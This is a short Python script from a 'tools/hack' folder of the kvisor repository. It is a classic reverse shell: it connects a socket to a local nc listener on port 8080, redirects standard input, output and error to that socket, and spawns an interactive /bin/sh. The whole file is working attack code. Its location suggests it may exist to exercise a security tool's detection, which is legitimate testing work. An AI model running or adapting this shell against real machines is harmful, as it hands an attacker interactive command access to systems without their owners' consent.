github.com/castai/kvisor@v1.7.1-0.20240516114728-b3572a2607b5/tools/hack/reverse_shell.py (about)

     1  ## Start server with nc -l 127.0.0.1 8080
     2  ## And run this script and separate shell.
     3  
     4  import socket,subprocess,os
     5  s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
     6  s.connect(("127.0.01", 8080))
     7  os.dup2(s.fileno(),0)
     8  os.dup2(s.fileno(),1)
     9  os.dup2(s.fileno(),2)
    10  p=subprocess.call(["/bin/sh","-i"])